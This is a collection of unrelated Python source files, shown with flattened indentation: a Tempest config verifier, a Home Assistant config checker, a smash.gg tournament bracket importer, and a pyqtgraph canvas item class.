if os.auth_version == 'v2':
catalog_key = 'serviceCatalog'
else:
catalog_key = 'catalog'
for entry in auth_data[catalog_key]:
services.append(entry['type'])
# Pull all catalog types from config file and compare against endpoint list
for cfgname in dir(CONF._config):
cfg = getattr(CONF, cfgname)
catalog_type = getattr(cfg, 'catalog_type', None)
if not catalog_type:
continue
else:
if cfgname == 'identity':
# Keystone is a required service for tempest
continue
if catalog_type not in services:
if getattr(CONF.service_available, codename_match[cfgname]):
                    print('Endpoint type %s not found: either disable service '
'%s or fix the catalog_type in the config file' % (
catalog_type, codename_match[cfgname]))
if update:
change_option(codename_match[cfgname],
'service_available', False)
else:
if not getattr(CONF.service_available,
codename_match[cfgname]):
print('Endpoint type %s is available, service %s should be'
' set as available in the config file.' % (
catalog_type, codename_match[cfgname]))
if update:
change_option(codename_match[cfgname],
'service_available', True)
# If we are going to enable this we should allow
# extension checks.
avail_services.append(codename_match[cfgname])
else:
avail_services.append(codename_match[cfgname])
return avail_services
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--update', action='store_true',
help='Update the config file with results from api '
'queries. This assumes whatever is set in the '
'config file is incorrect. In the case of '
                             'endpoint checks, where it could either be the '
                             'incorrect catalog type or the service available '
                             'option, the service available option is assumed '
'to be incorrect and is thus changed')
parser.add_argument('-o', '--output',
help="Output file to write an updated config file to. "
"This has to be a separate file from the "
"original config file. If one isn't specified "
"with -u the new config file will be printed to "
"STDOUT")
parser.add_argument('-r', '--replace-ext', action='store_true',
help="If specified the all option will be replaced "
"with a full list of extensions")
args = parser.parse_args()
return args
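# Hypothetical invocation (the script name is an assumption):
#   python verify_tempest_config.py -u -o updated_tempest.conf -r
# -u updates options based on the API queries, -o writes the new config to a
# separate file, and -r replaces the 'all' extensions marker with the full
# discovered list.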
def main():
print('Running config verification...')
opts = parse_args()
update = opts.update
replace = opts.replace_ext
global CONF_PARSER
outfile = sys.stdout
if update:
conf_file = _get_config_file()
if opts.output:
outfile = open(opts.output, 'w+')
CONF_PARSER = moves.configparser.SafeConfigParser()
CONF_PARSER.optionxform = str
CONF_PARSER.readfp(conf_file)
icreds = credentials.get_credentials_provider('verify_tempest_config')
try:
os = clients.Manager(icreds.get_primary_creds())
services = check_service_availability(os, update)
results = {}
for service in ['nova', 'cinder', 'neutron', 'swift']:
if service not in services:
continue
results = verify_extensions(os, service, results)
# Verify API versions of all services in the keystone catalog and
# keystone itself.
services.append('keystone')
for service in services:
verify_api_versions(os, service, update)
display_results(results, update, replace)
if update:
conf_file.close()
CONF_PARSER.write(outfile)
outfile.close()
finally:
icreds.clear_creds()
if __name__ == "__main__":
main()
|
|
"""Helper to check the configuration file."""
from __future__ import annotations
from collections import OrderedDict
import logging
import os
from pathlib import Path
from typing import List, NamedTuple, Optional
import voluptuous as vol
from homeassistant import loader
from homeassistant.config import (
CONF_CORE,
CONF_PACKAGES,
CORE_CONFIG_SCHEMA,
YAML_CONFIG_FILE,
_format_config_error,
config_per_platform,
extract_domain_configs,
load_yaml_config_file,
merge_packages_config,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.typing import ConfigType
from homeassistant.requirements import (
RequirementsNotFound,
async_get_integration_with_requirements,
)
import homeassistant.util.yaml.loader as yaml_loader
class CheckConfigError(NamedTuple):
"""Configuration check error."""
message: str
domain: Optional[str]
config: Optional[ConfigType]
class HomeAssistantConfig(OrderedDict):
"""Configuration result with errors attribute."""
def __init__(self) -> None:
"""Initialize HA config."""
super().__init__()
self.errors: List[CheckConfigError] = []
def add_error(
self,
message: str,
domain: Optional[str] = None,
config: Optional[ConfigType] = None,
) -> HomeAssistantConfig:
"""Add a single error."""
self.errors.append(CheckConfigError(str(message), domain, config))
return self
@property
def error_str(self) -> str:
"""Return errors as a string."""
return "\n".join([err.message for err in self.errors])
async def async_check_ha_config_file(hass: HomeAssistant) -> HomeAssistantConfig:
"""Load and check if Home Assistant configuration file is valid.
This method is a coroutine.
"""
result = HomeAssistantConfig()
def _pack_error(
package: str, component: str, config: ConfigType, message: str
) -> None:
"""Handle errors from packages: _log_pkg_error."""
message = f"Package {package} setup failed. Component {component} {message}"
domain = f"homeassistant.packages.{package}.{component}"
pack_config = core_config[CONF_PACKAGES].get(package, config)
result.add_error(message, domain, pack_config)
def _comp_error(ex: Exception, domain: str, config: ConfigType) -> None:
"""Handle errors from components: async_log_exception."""
result.add_error(_format_config_error(ex, domain, config)[0], domain, config)
# Load configuration.yaml
config_path = hass.config.path(YAML_CONFIG_FILE)
try:
if not await hass.async_add_executor_job(os.path.isfile, config_path):
return result.add_error("File configuration.yaml not found.")
assert hass.config.config_dir is not None
config = await hass.async_add_executor_job(
load_yaml_config_file,
config_path,
yaml_loader.Secrets(Path(hass.config.config_dir)),
)
except FileNotFoundError:
return result.add_error(f"File not found: {config_path}")
except HomeAssistantError as err:
return result.add_error(f"Error loading {config_path}: {err}")
# Extract and validate core [homeassistant] config
try:
core_config = config.pop(CONF_CORE, {})
core_config = CORE_CONFIG_SCHEMA(core_config)
result[CONF_CORE] = core_config
except vol.Invalid as err:
result.add_error(err, CONF_CORE, core_config)
core_config = {}
# Merge packages
await merge_packages_config(
hass, config, core_config.get(CONF_PACKAGES, {}), _pack_error
)
core_config.pop(CONF_PACKAGES, None)
# Filter out repeating config sections
components = {key.split(" ")[0] for key in config.keys()}
# Process and validate config
for domain in components:
try:
integration = await async_get_integration_with_requirements(hass, domain)
except (RequirementsNotFound, loader.IntegrationNotFound) as ex:
result.add_error(f"Component error: {domain} - {ex}")
continue
try:
component = integration.get_component()
except ImportError as ex:
result.add_error(f"Component error: {domain} - {ex}")
continue
# Check if the integration has a custom config validator
config_validator = None
try:
config_validator = integration.get_platform("config")
except ImportError as err:
# Filter out import error of the config platform.
# If the config platform contains bad imports, make sure
# that still fails.
if err.name != f"{integration.pkg_path}.config":
result.add_error(f"Error importing config platform {domain}: {err}")
continue
if config_validator is not None and hasattr(
config_validator, "async_validate_config"
):
try:
result[domain] = (
await config_validator.async_validate_config( # type: ignore
hass, config
)
)[domain]
continue
except (vol.Invalid, HomeAssistantError) as ex:
_comp_error(ex, domain, config)
continue
except Exception as err: # pylint: disable=broad-except
logging.getLogger(__name__).exception(
"Unexpected error validating config"
)
result.add_error(
f"Unexpected error calling config validator: {err}",
domain,
config.get(domain),
)
continue
config_schema = getattr(component, "CONFIG_SCHEMA", None)
if config_schema is not None:
try:
config = config_schema(config)
result[domain] = config[domain]
except vol.Invalid as ex:
_comp_error(ex, domain, config)
continue
component_platform_schema = getattr(
component,
"PLATFORM_SCHEMA_BASE",
getattr(component, "PLATFORM_SCHEMA", None),
)
if component_platform_schema is None:
continue
platforms = []
for p_name, p_config in config_per_platform(config, domain):
# Validate component specific platform schema
try:
p_validated = component_platform_schema(p_config)
except vol.Invalid as ex:
_comp_error(ex, domain, config)
continue
# Not all platform components follow same pattern for platforms
# So if p_name is None we are not going to validate platform
# (the automation component is one of them)
if p_name is None:
platforms.append(p_validated)
continue
try:
p_integration = await async_get_integration_with_requirements(
hass, p_name
)
platform = p_integration.get_platform(domain)
except (
loader.IntegrationNotFound,
RequirementsNotFound,
ImportError,
) as ex:
result.add_error(f"Platform error {domain}.{p_name} - {ex}")
continue
# Validate platform specific schema
platform_schema = getattr(platform, "PLATFORM_SCHEMA", None)
if platform_schema is not None:
try:
p_validated = platform_schema(p_validated)
except vol.Invalid as ex:
_comp_error(ex, f"{domain}.{p_name}", p_validated)
continue
platforms.append(p_validated)
# Remove config for current component and add validated config back in.
for filter_comp in extract_domain_configs(config, domain):
del config[filter_comp]
result[domain] = platforms
return result
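# Minimal usage sketch (assumes an initialized HomeAssistant instance `hass`;
# illustration only, not part of this helper).
async def _example_check_config(hass: HomeAssistant) -> None:
    result = await async_check_ha_config_file(hass)
    if result.errors:
        logging.getLogger(__name__).warning(
            "Config check errors:\n%s", result.error_str
        )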
|
|
import sys
sys.path.insert(0,'..')
sys.path.insert(0,'../sanitize')
from app.models import *
import urllib3
import json
import requests
from pprint import pprint
from date_utils import *
from trueskill_functions import *
from misc_utils import print_ignore
# To be converted into TournamentHeader objects
class TournamentInfo:
'''
Object to carry tournament information across functions
'''
parent=""
title=""
host=""
public_url=""
url=""
entrants=0
game_type=""
bracket_type=""
def __init__(self, id, name, region, date):
self.id = id
self.name = name
self.region = region
self.date = date
def __str__(self):
return 'TournamentInfo(id=%s, parent=%s, name=%s, region=%s, date=%s, title=%s, host=%s, \
public_url=%s, url=%s, entrants=%s, bracket_type=%s, game_type=%s)' % (self.id, self.parent, self.name, self.region,
self.date, self.title, self.host, self.public_url, self.url, self.entrants, self.bracket_type, self.game_type)
class SubBracket:
'''
Object to carry SubBracket info
'''
phase_id = 0
wave_id = 0
name = ""
url = ""
def __init__(self, id):
self.id = id
def __str__(self):
return 'SubBracket(id=%s, phase_id=%s, wave_id=%s, name=%s, url=%s)' % \
(self.id, self.phase_id, self.wave_id, self.name, self.url)
class EntrantInfo:
'''
Object to carry Entrant info
'''
entrant_id = 0
entrant_name = ""
player_tag = ""
player_prefix = ""
player_id = 0
player_region = ""
player_country = ""
player_state = ""
player_sub_seed = ""
player_super_seed = ""
player_sub_placing = ""
player_super_placing = ""
def __init__(self, id, entrant_name):
# Unique to current tournament
self.entrant_id = id
self.entrant_name = entrant_name
def __str__(self):
return 'EntrantInfo(entrant_id=%s, entrant_name=%s, player_tag=%s, player_prefix=%s, player_id=%s, player_region=%s, player_country=%s, player_state=%s, player_sub_seed=%s, player_super_seed=%s, player_sub_placing=%s, player_super_placing=%s)' % \
(self.entrant_id, self.entrant_name, self.player_tag, self.player_prefix, self.player_id, self.player_region, self.player_country, self.player_state, self.player_sub_seed, self.player_super_seed, self.player_sub_placing, self.player_super_placing)
class SetInfo:
'''
Object to carry Set info
'''
id = 0
round_number = 0
round_text = ""
best_of = 0
winner_id = 0
loser_id = 0
winner_tag = ""
loser_tag = ""
winner_score = 0
loser_score = 0
    total_matches = winner_score + loser_score  # 0 at class level; recomputed per set
def __init__(self, id):
self.id = id
def __str__(self):
return 'SetInfo(id=%s, round_number=%s, round_text=%s, best_of=%s, winner_id=%s, loser_id=%s, winner_tag=%s, loser_tag=%s, winner_score=%s, loser_score=%s, total_matches=%s)' % \
(self.id, self.round_number, self.round_text, self.best_of, self.winner_id, self.loser_id, self.winner_tag, self.loser_tag, self.winner_score, self.loser_score, self.total_matches)
# Gets the tournament header info and stores it in TournamentInfo object
def parse_tournament_info(tournament_id, tournament_url, tournament_name, tournament_region, tournament_date):
info_url = "https://api.smash.gg/event/" + tournament_id
info = requests.get(info_url)
info_json = info.json()
# pprint(info_json)
tournament_info = TournamentInfo(tournament_id, tournament_name, tournament_region, tournament_date)
if info_json['entities']['event'].get("startedAt") is not None:
tournament_info.date = convert_int_date(info_json['entities']['event'].get("startedAt"))
else:
tournament_info.date = convert_int_date(tournament_date)
tournament_info.public_url = tournament_url
tournament_info.game_type = info_json['entities']['event'].get("typeDisplayStr")
tournament_info.title = info_json['entities']['event'].get("slug")
tournament_info.url = info_url
print "\n---TOURNAMENT INFO---\n", tournament_info
return tournament_info
# Parse sub_brackets of parent tournaments.
# If the master tournament only has one sub bracket, it will find it in parse_smashgg_info and call this function
def parse_sub_bracket_info(sub_bracket_info, tournament_info):
sub_bracket_url = sub_bracket_info.url
# hack for tournaments with incomplete pools
#if sub_bracket_info.name!='1':
# return
# in smashgg brackets, sub_bracket for Final Bracket is named '1'
print "---NAME--", sub_bracket_info.name
if sub_bracket_info.name=='1':
sub_tournament_name = ''
else:
sub_tournament_name = ' | ' + sub_bracket_info.name
full_bracket_name = tournament_info.name + sub_tournament_name
print "\n---SUB BRACKET---:", full_bracket_name
sub_bracket = requests.get(sub_bracket_url)
sub_bracket_json = sub_bracket.json()
# pprint(sub_bracket_json)
# Make call to import_tournament_info using parent tournament info (tournament_info)
# Change values for # entrants, url, name
sub_tournament_info = TournamentInfo(sub_bracket_info.id, full_bracket_name, tournament_info.region, tournament_info.date)
sub_tournament_info.url = sub_bracket_url
if sub_bracket_info.name=='1':
sub_tournament_info.public_url = tournament_info.public_url
else:
sub_tournament_info.public_url = tournament_info.public_url + '/' + str(sub_bracket_info.id)
    # Inherited from parent tournament header
sub_tournament_info.entrants = tournament_info.entrants
sub_tournament_info.date = tournament_info.date
sub_tournament_info.parent = tournament_info.name
sub_tournament_info.game_type = tournament_info.game_type
print sub_tournament_info
sub_tournament = import_sub_tournament_info(sub_tournament_info)
entrant_list = parse_bracket_entrants(sub_bracket_json, sub_tournament)
parse_bracket_sets(sub_bracket_json, entrant_list, sub_tournament)
def parse_bracket_entrants(sub_bracket_json, sub_tournament):
condensed_entrants = sub_bracket_json['entities']['seeds']
# pprint(condensed_entrants)
entrant_list = []
for entrant in condensed_entrants:
# pprint(entrant)
entrant_id = str(entrant.get("entrantId"))
participant_id = str(entrant['mutations']['entrants'][entrant_id]['participantIds'][0])
player_id = str(entrant['mutations']['entrants'][entrant_id]['playerIds'][participant_id])
print entrant_id, participant_id, player_id
entrant_name = entrant['mutations']['entrants'][entrant_id].get("name")
entrant_info = EntrantInfo(int(entrant_id), entrant_name)
# entrant['mutations']['players'][entrant_id] returns list containing one dictionary
entrant_info.player_tag = entrant['mutations']['players'][player_id].get("gamerTag")
entrant_info.player_prefix = entrant['mutations']['players'][player_id].get("prefix")
entrant_info.player_id = entrant['mutations']['players'][player_id].get("id")
entrant_info.player_region = entrant['mutations']['players'][player_id].get("region")
entrant_info.player_country = entrant['mutations']['players'][player_id].get("country")
entrant_info.player_state = entrant['mutations']['players'][player_id].get("state")
entrant_info.player_sub_seed = entrant.get("groupSeedNum")
entrant_info.player_super_seed = entrant.get("seedNum")
entrant_info.player_sub_placing = entrant.get("placement")
entrant_info.player_super_placing = entrant.get("placement")
entrant_list.append(entrant_info)
print "\n---ENTRANTS---"
for entrant in entrant_list:
print_ignore(entrant)
import_tournament_entrants(entrant_list, sub_tournament)
return entrant_list
# Given JSON of the sub_bracket and list of entrants, isolate sets and record each one individually
def parse_bracket_sets(sub_bracket_json, entrant_list, sub_tournament):
sets = sub_bracket_json['entities']['sets']
# pprint(sets)
set_list = []
for set in sets:
set_id = set.get("id")
set_info = SetInfo(set_id)
set_info.round_number = set.get("round")
set_info.round_text = set.get("midRoundText")
set_info.best_of = set.get("bestOf")
entrant1Score = set.get("entrant1Score")
entrant2Score = set.get("entrant2Score")
if (entrant1Score is None and entrant2Score is None) or (entrant1Score<0 or entrant2Score<0):
continue
if set.get("entrant1Id")==set.get("winnerId"):
set_info.winner_id = set.get("entrant1Id")
set_info.loser_id = set.get("entrant2Id")
set_info.winner_score = entrant1Score
set_info.loser_score = entrant2Score
else:
set_info.winner_id = set.get("entrant2Id")
set_info.loser_id = set.get("entrant1Id")
set_info.winner_score = entrant2Score
set_info.loser_score = entrant1Score
set_info.total_matches = set_info.winner_score + set_info.loser_score
        # This lookup could be made more efficient.
set_info.winner_tag = next((entrant.entrant_name for entrant in entrant_list if set_info.winner_id==entrant.entrant_id), None)
set_info.loser_tag = next((entrant.entrant_name for entrant in entrant_list if set_info.loser_id==entrant.entrant_id), None)
set_list.append(set_info)
# reassign to entrants in import sets
# set.get('wOverallPlacement')
# set.get('wPlacement')
import_tournament_sets(set_list, sub_tournament)
# Given processed tournament_info object parse_tournament_info, add TournamentHeader object to database
def import_tournament_info(tournament_info):
tournament_game_type = "Super Smash Bros. Melee"
    # if a date is located in the smash.gg bracket, use it; otherwise use the date passed in as a parameter
if tournament_info.date is not None:
tournament_date = tournament_info.date
else:
tournament_date = datetime.date(2099, 01, 01)
new_tournament_header = TournamentHeader(official_title=tournament_info.title,
host=tournament_info.host,
public_url=tournament_info.public_url,
url=tournament_info.url,
name=tournament_info.name,
game_type=tournament_game_type,
date=tournament_date
)
db.session.add(new_tournament_header)
# add tournament_region; if None, then it adds None
found_region = Region.query.filter(Region.region==tournament_info.region).first()
new_tournament_header.region = found_region
db.session.commit()
return new_tournament_header
def import_sub_tournament_info(sub_tournament_info):
new_sub_tournament = Tournament(official_title=sub_tournament_info.title,
url=sub_tournament_info.url,
public_url=sub_tournament_info.public_url,
entrants=sub_tournament_info.entrants,
date=sub_tournament_info.date,
name=sub_tournament_info.name,
game_type=sub_tournament_info.game_type
)
db.session.add(new_sub_tournament)
# associate with TournamentHeader
tournament_header = TournamentHeader.query.filter(TournamentHeader.name==sub_tournament_info.parent).first()
tournament_header.sub_tournaments.append(new_sub_tournament)
new_sub_tournament.region = new_sub_tournament.header.region
db.session.commit()
print "\n---SUBTOURNAMENT---", new_sub_tournament
return new_sub_tournament
# Import smashgg entrants and create User objects in database
def import_tournament_entrants(entrant_list, tournament_obj):
for entrant in entrant_list:
player_tag = entrant.player_tag
checked_player = check_set_user(player_tag, tournament_obj.region)
tournament_obj.placements.append(Placement(
tournament_id=tournament_obj.id,
tournament_name=tournament_obj.name,
user_id=checked_player.id,
placement=int(entrant.player_sub_placing)
))
tournament_obj.entrants = len(entrant_list)
db.session.commit()
return tournament_obj
# Import smashgg sets, associate them with Tournament and create Set objects in database
def import_tournament_sets(set_list, sub_tournament):
print '\n---SETS---'
for set in set_list:
print_ignore(set)
winner_score = set.winner_score
loser_score = set.loser_score
total_matches = set.total_matches
# After calling this function, Users by 'tag' will exist in database in any case.
# stores User object in respective variables
set_winner_tag = set.winner_tag.strip()
winner_user = check_set_user(set_winner_tag, sub_tournament.region)
set_loser_tag = set.loser_tag.strip()
loser_user = check_set_user(set_loser_tag, sub_tournament.region)
round_number = set.round_number
# Query for associated Tournament
if sub_tournament.name is not None:
assocs_tournament = Tournament.query.filter(Tournament.name==sub_tournament.name).first()
        else:
            print "Tournament not Found"
            continue
new_set = Set(tournament_id=assocs_tournament.id,
tournament_name=assocs_tournament.name,
round_type=round_number,
winner_tag=winner_user.tag,
loser_tag=loser_user.tag,
winner_id=winner_user.id,
loser_id=loser_user.id,
winner_score=winner_score,
loser_score=loser_score,
total_matches=total_matches)
db.session.add(new_set)
print_ignore(set)
# update User trueskill ratings based on Set winner and loser
update_rating(winner_user, loser_user)
db.session.commit()
# Master function
def parse_bracket_info(tournament_url, tournament_name, tournament_region, tournament_date):
print "\n---PROCESSING---: ", tournament_name
if tournament_url is None:
return None
else:
        # Slice the master tournament_id out of the URL (first number after 'brackets/')
id_start = tournament_url.find("brackets/") + 9
id_end = tournament_url.find("/", id_start)
tournament_id = tournament_url[id_start:id_end]
api_url = "https://api.smash.gg/event/" + tournament_id + "?expand[0]=groups&expand[1]=phase"
master = requests.get(api_url)
master_json = master.json()
# pprint(master_json)
# Process and import tournament info, creating new Tournament object
tournament_info = parse_tournament_info(tournament_id, tournament_url, tournament_name, tournament_region, tournament_date)
tournament_obj = import_tournament_info(tournament_info)
# At this point, master is the JSON showing all the sub_bracket/pool tournaments that are contained within this tournament
        # Subgroups begin at "displayIdentifier"; we want the IDs of each individual sub_bracket.
# Create list of dictionaries of each sub_bracket with relevant ID info. Only really need "id", to get sub_bracket url
sub_brackets = master_json['entities']['groups']
bracket_list = []
for sub_bracket in sub_brackets:
sub_bracket_info = SubBracket(sub_bracket.get("id"))
sub_bracket_info.phase_id = sub_bracket.get("phaseId")
sub_bracket_info.wave_id = sub_bracket.get("waveId")
sub_bracket_info.name = sub_bracket.get("displayIdentifier")
sub_bracket_info.url = "https://api.smash.gg/phase_group/" + str(sub_bracket_info.id) + "?expand%5B%5D=sets&expand%5B%5D=seeds&expand%5B%5D=entrants"
bracket_list.append(sub_bracket_info)
print "***SUBBRACKET INFO***", sub_bracket_info
for sub_bracket_info in bracket_list:
parse_sub_bracket_info(sub_bracket_info, tournament_info)
# Calculate and assign entrants for tournamentHeader
tournament_header = TournamentHeader.query.filter(TournamentHeader.name==tournament_name).first()
tournament_header.get_final_entrants()
print "---FINISHED---"
return tournament_header
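# Hypothetical usage sketch (URL, name, region and timestamp are made up; a
# real run hits the smash.gg API and writes to the app database):
def _example_parse_bracket_info():
    return parse_bracket_info(
        "https://smash.gg/tournament/example-weekly/brackets/12345/67890",
        "Example Weekly #1", "norcal", 1480000000)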
|
|
# -*- coding: utf-8 -*-
import numpy as np
from ..Qt import QtGui, QtCore, QtSvg, QT_LIB
from ..graphicsItems.ROI import ROI
from .. import SRTTransform, ItemGroup
if QT_LIB == 'PySide':
from . import TransformGuiTemplate_pyside as TransformGuiTemplate
elif QT_LIB == 'PyQt4':
from . import TransformGuiTemplate_pyqt as TransformGuiTemplate
elif QT_LIB == 'PyQt5':
from . import TransformGuiTemplate_pyqt5 as TransformGuiTemplate
from .. import debug
class SelectBox(ROI):
def __init__(self, scalable=False, rotatable=True):
#QtGui.QGraphicsRectItem.__init__(self, 0, 0, size[0], size[1])
ROI.__init__(self, [0,0], [1,1], invertible=True)
center = [0.5, 0.5]
if scalable:
self.addScaleHandle([1, 1], center, lockAspect=True)
self.addScaleHandle([0, 0], center, lockAspect=True)
if rotatable:
self.addRotateHandle([0, 1], center)
self.addRotateHandle([1, 0], center)
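# Minimal sketch (assumes a running QApplication; illustration only): build a
# scalable, rotatable selection box and read back its state the same way
# CanvasItem records selectBoxBase.
def _example_select_box():
    box = SelectBox(scalable=True, rotatable=True)
    box.setPos([10, 10])
    box.setSize([100, 50])
    return box.getState()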
class CanvasItem(QtCore.QObject):
    """CanvasItem takes care of managing an item's state--alpha, visibility,
    z-value, transformations, etc. and provides a control widget.
    """
    sigResetUserTransform = QtCore.Signal(object)
    sigTransformChangeFinished = QtCore.Signal(object)
    sigTransformChanged = QtCore.Signal(object)
    sigVisibilityChanged = QtCore.Signal(object)
transformCopyBuffer = None
def __init__(self, item, **opts):
defOpts = {'name': None, 'z': None, 'movable': True, 'scalable': False, 'rotatable': True, 'visible': True, 'parent':None} #'pos': [0,0], 'scale': [1,1], 'angle':0,
defOpts.update(opts)
self.opts = defOpts
self.selectedAlone = False ## whether this item is the only one selected
QtCore.QObject.__init__(self)
self.canvas = None
self._graphicsItem = item
parent = self.opts['parent']
if parent is not None:
self._graphicsItem.setParentItem(parent.graphicsItem())
self._parentItem = parent
else:
self._parentItem = None
z = self.opts['z']
if z is not None:
item.setZValue(z)
self.ctrl = QtGui.QWidget()
self.layout = QtGui.QGridLayout()
self.layout.setSpacing(0)
self.layout.setContentsMargins(0,0,0,0)
self.ctrl.setLayout(self.layout)
self.alphaLabel = QtGui.QLabel("Alpha")
self.alphaSlider = QtGui.QSlider()
self.alphaSlider.setMaximum(1023)
self.alphaSlider.setOrientation(QtCore.Qt.Horizontal)
self.alphaSlider.setValue(1023)
self.layout.addWidget(self.alphaLabel, 0, 0)
self.layout.addWidget(self.alphaSlider, 0, 1)
self.resetTransformBtn = QtGui.QPushButton('Reset Transform')
self.copyBtn = QtGui.QPushButton('Copy')
self.pasteBtn = QtGui.QPushButton('Paste')
self.transformWidget = QtGui.QWidget()
self.transformGui = TransformGuiTemplate.Ui_Form()
self.transformGui.setupUi(self.transformWidget)
self.layout.addWidget(self.transformWidget, 3, 0, 1, 2)
self.transformGui.mirrorImageBtn.clicked.connect(self.mirrorY)
self.transformGui.reflectImageBtn.clicked.connect(self.mirrorXY)
self.layout.addWidget(self.resetTransformBtn, 1, 0, 1, 2)
self.layout.addWidget(self.copyBtn, 2, 0, 1, 1)
self.layout.addWidget(self.pasteBtn, 2, 1, 1, 1)
self.alphaSlider.valueChanged.connect(self.alphaChanged)
self.alphaSlider.sliderPressed.connect(self.alphaPressed)
self.alphaSlider.sliderReleased.connect(self.alphaReleased)
self.resetTransformBtn.clicked.connect(self.resetTransformClicked)
self.copyBtn.clicked.connect(self.copyClicked)
self.pasteBtn.clicked.connect(self.pasteClicked)
self.setMovable(self.opts['movable']) ## update gui to reflect this option
if 'transform' in self.opts:
self.baseTransform = self.opts['transform']
else:
self.baseTransform = SRTTransform()
if 'pos' in self.opts and self.opts['pos'] is not None:
self.baseTransform.translate(self.opts['pos'])
if 'angle' in self.opts and self.opts['angle'] is not None:
self.baseTransform.rotate(self.opts['angle'])
if 'scale' in self.opts and self.opts['scale'] is not None:
self.baseTransform.scale(self.opts['scale'])
## create selection box (only visible when selected)
tr = self.baseTransform.saveState()
if 'scalable' not in opts and tr['scale'] == (1,1):
self.opts['scalable'] = True
## every CanvasItem implements its own individual selection box
## so that subclasses are free to make their own.
self.selectBox = SelectBox(scalable=self.opts['scalable'], rotatable=self.opts['rotatable'])
self.selectBox.hide()
self.selectBox.setZValue(1e6)
self.selectBox.sigRegionChanged.connect(self.selectBoxChanged) ## calls selectBoxMoved
self.selectBox.sigRegionChangeFinished.connect(self.selectBoxChangeFinished)
## set up the transformations that will be applied to the item
## (It is not safe to use item.setTransform, since the item might count on that not changing)
self.itemRotation = QtGui.QGraphicsRotation()
self.itemScale = QtGui.QGraphicsScale()
self._graphicsItem.setTransformations([self.itemRotation, self.itemScale])
self.tempTransform = SRTTransform() ## holds the additional transform that happens during a move - gets added to the userTransform when move is done.
self.userTransform = SRTTransform() ## stores the total transform of the object
self.resetUserTransform()
def setMovable(self, m):
self.opts['movable'] = m
if m:
self.resetTransformBtn.show()
self.copyBtn.show()
self.pasteBtn.show()
else:
self.resetTransformBtn.hide()
self.copyBtn.hide()
self.pasteBtn.hide()
def setCanvas(self, canvas):
## Called by canvas whenever the item is added.
## It is our responsibility to add all graphicsItems to the canvas's scene
## The canvas will automatically add our graphicsitem,
## so we just need to take care of the selectbox.
if canvas is self.canvas:
return
if canvas is None:
self.canvas.removeFromScene(self._graphicsItem)
self.canvas.removeFromScene(self.selectBox)
else:
canvas.addToScene(self._graphicsItem)
canvas.addToScene(self.selectBox)
self.canvas = canvas
def graphicsItem(self):
"""Return the graphicsItem for this canvasItem."""
return self._graphicsItem
def parentItem(self):
return self._parentItem
def setParentItem(self, parent):
self._parentItem = parent
if parent is not None:
if isinstance(parent, CanvasItem):
parent = parent.graphicsItem()
self.graphicsItem().setParentItem(parent)
#def name(self):
#return self.opts['name']
def copyClicked(self):
CanvasItem.transformCopyBuffer = self.saveTransform()
def pasteClicked(self):
t = CanvasItem.transformCopyBuffer
if t is None:
return
else:
self.restoreTransform(t)
def mirrorY(self):
if not self.isMovable():
return
#flip = self.transformGui.mirrorImageCheck.isChecked()
#tr = self.userTransform.saveState()
inv = SRTTransform()
inv.scale(-1, 1)
self.userTransform = self.userTransform * inv
self.updateTransform()
self.selectBoxFromUser()
self.sigTransformChangeFinished.emit(self)
#if flip:
#if tr['scale'][0] < 0 xor tr['scale'][1] < 0:
#return
#else:
#self.userTransform.setScale([-tr['scale'][0], tr['scale'][1]])
#self.userTransform.setTranslate([-tr['pos'][0], tr['pos'][1]])
#self.userTransform.setRotate(-tr['angle'])
#self.updateTransform()
#self.selectBoxFromUser()
#return
#elif not flip:
#if tr['scale'][0] > 0 and tr['scale'][1] > 0:
#return
#else:
#self.userTransform.setScale([-tr['scale'][0], tr['scale'][1]])
#self.userTransform.setTranslate([-tr['pos'][0], tr['pos'][1]])
#self.userTransform.setRotate(-tr['angle'])
#self.updateTransform()
#self.selectBoxFromUser()
#return
def mirrorXY(self):
if not self.isMovable():
return
self.rotate(180.)
# inv = SRTTransform()
# inv.scale(-1, -1)
# self.userTransform = self.userTransform * inv #flip lr/ud
# s=self.updateTransform()
# self.setTranslate(-2*s['pos'][0], -2*s['pos'][1])
# self.selectBoxFromUser()
def hasUserTransform(self):
#print self.userRotate, self.userTranslate
return not self.userTransform.isIdentity()
def ctrlWidget(self):
return self.ctrl
def alphaChanged(self, val):
alpha = val / 1023.
self._graphicsItem.setOpacity(alpha)
def setAlpha(self, alpha):
self.alphaSlider.setValue(int(np.clip(alpha * 1023, 0, 1023)))
def alpha(self):
return self.alphaSlider.value() / 1023.
def isMovable(self):
return self.opts['movable']
def selectBoxMoved(self):
"""The selection box has moved; get its transformation information and pass to the graphics item"""
self.userTransform = self.selectBox.getGlobalTransform(relativeTo=self.selectBoxBase)
self.updateTransform()
def scale(self, x, y):
self.userTransform.scale(x, y)
self.selectBoxFromUser()
self.updateTransform()
def rotate(self, ang):
self.userTransform.rotate(ang)
self.selectBoxFromUser()
self.updateTransform()
def translate(self, x, y):
self.userTransform.translate(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setTranslate(self, x, y):
self.userTransform.setTranslate(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setRotate(self, angle):
self.userTransform.setRotate(angle)
self.selectBoxFromUser()
self.updateTransform()
def setScale(self, x, y):
self.userTransform.setScale(x, y)
self.selectBoxFromUser()
self.updateTransform()
def setTemporaryTransform(self, transform):
self.tempTransform = transform
self.updateTransform()
def applyTemporaryTransform(self):
"""Collapses tempTransform into UserTransform, resets tempTransform"""
self.userTransform = self.userTransform * self.tempTransform ## order is important!
self.resetTemporaryTransform()
self.selectBoxFromUser() ## update the selection box to match the new userTransform
def resetTemporaryTransform(self):
self.tempTransform = SRTTransform() ## don't use Transform.reset()--this transform might be used elsewhere.
self.updateTransform()
def transform(self):
return self._graphicsItem.transform()
def updateTransform(self):
"""Regenerate the item position from the base, user, and temp transforms"""
transform = self.baseTransform * self.userTransform * self.tempTransform ## order is important
s = transform.saveState()
self._graphicsItem.setPos(*s['pos'])
self.itemRotation.setAngle(s['angle'])
self.itemScale.setXScale(s['scale'][0])
self.itemScale.setYScale(s['scale'][1])
self.displayTransform(transform)
        return s  # return the transform state
def displayTransform(self, transform):
"""Updates transform numbers in the ctrl widget."""
tr = transform.saveState()
self.transformGui.translateLabel.setText("Translate: (%f, %f)" %(tr['pos'][0], tr['pos'][1]))
self.transformGui.rotateLabel.setText("Rotate: %f degrees" %tr['angle'])
self.transformGui.scaleLabel.setText("Scale: (%f, %f)" %(tr['scale'][0], tr['scale'][1]))
def resetUserTransform(self):
self.userTransform.reset()
